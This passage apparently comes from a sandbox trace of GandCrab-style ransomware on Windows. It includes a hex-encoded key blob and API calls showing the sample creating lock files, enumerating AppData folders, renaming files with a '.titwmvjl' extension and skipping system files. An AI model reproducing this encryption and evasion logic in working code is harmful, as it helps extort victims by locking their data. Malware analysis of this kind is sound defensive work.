x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0070.226] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0070.227] CloseHandle (hObject=0x2bc) returned 1 [0070.227] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.227] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.227] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x21f)) [0070.227] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.228] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0070.228] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0070.228] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\d2ca4a09d2ca4deb61a.lock") returned 112 [0070.228] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\identities\\{ca8ca1bb-f2a6-4e9c-b7cc-fb56671763e8}\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0070.228] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.229] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\") returned 88 [0070.229] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\*" [0070.229] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503738 [0070.229] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.229] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.229] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.229] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.229] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.229] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0070.229] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0070.229] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\d2ca4a09d2ca4deb61a.lock" [0070.229] lstrlenW (lpString=".titwmvjl") returned 9 [0070.229] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\d2ca4a09d2ca4deb61a.lock") returned 112 [0070.229] VirtualAlloc (lpAddress=0x0, dwSize=0x120, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.230] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 121 [0070.230] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\d2ca4a09d2ca4deb61a.lock") returned 112 [0070.230] lstrlenW (lpString=".lock") returned 5 [0070.230] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.230] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0070.230] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.230] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.230] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.230] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0070.230] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0070.230] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\TITWMVJL-DECRYPT.txt" [0070.230] lstrlenW (lpString=".titwmvjl") returned 9 [0070.231] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\TITWMVJL-DECRYPT.txt") returned 108 [0070.231] VirtualAlloc (lpAddress=0x0, dwSize=0x118, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.231] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 117 [0070.231] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\TITWMVJL-DECRYPT.txt") returned 108 [0070.231] lstrlenW (lpString=".txt") returned 4 [0070.231] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.231] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0070.231] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0070.231] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.231] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\TITWMVJL-DECRYPT.txt") returned 108 [0070.231] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\{CA8CA1BB-F2A6-4E9C-B7CC-FB56671763E8}\\TITWMVJL-DECRYPT.txt") returned 108 [0070.231] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0070.231] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0070.231] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0070.231] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0070.231] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0070.231] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0070.231] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0070.231] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0070.231] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.232] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0070.232] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0070.232] CloseHandle (hObject=0x2bc) returned 1 [0070.232] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0070.232] FindClose (in: hFindFile=0x503338 | out: hFindFile=0x503338) returned 1 [0070.233] CloseHandle (hObject=0x2b4) returned 1 [0070.233] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0070.233] lstrcmpW (lpString1="JBi-kk0FV6SxVr.png", lpString2=".") returned 1 [0070.233] lstrcmpW (lpString1="JBi-kk0FV6SxVr.png", lpString2="..") returned 1 [0070.233] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="JBi-kk0FV6SxVr.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JBi-kk0FV6SxVr.png") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JBi-kk0FV6SxVr.png" [0070.233] lstrlenW (lpString=".titwmvjl") returned 9 [0070.233] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JBi-kk0FV6SxVr.png") returned 56 [0070.233] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.234] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JBi-kk0FV6SxVr.png.titwmvjl") returned 65 [0070.234] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\JBi-kk0FV6SxVr.png") returned 56 [0070.234] lstrlenW (lpString=".png") returned 4 [0070.234] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.234] 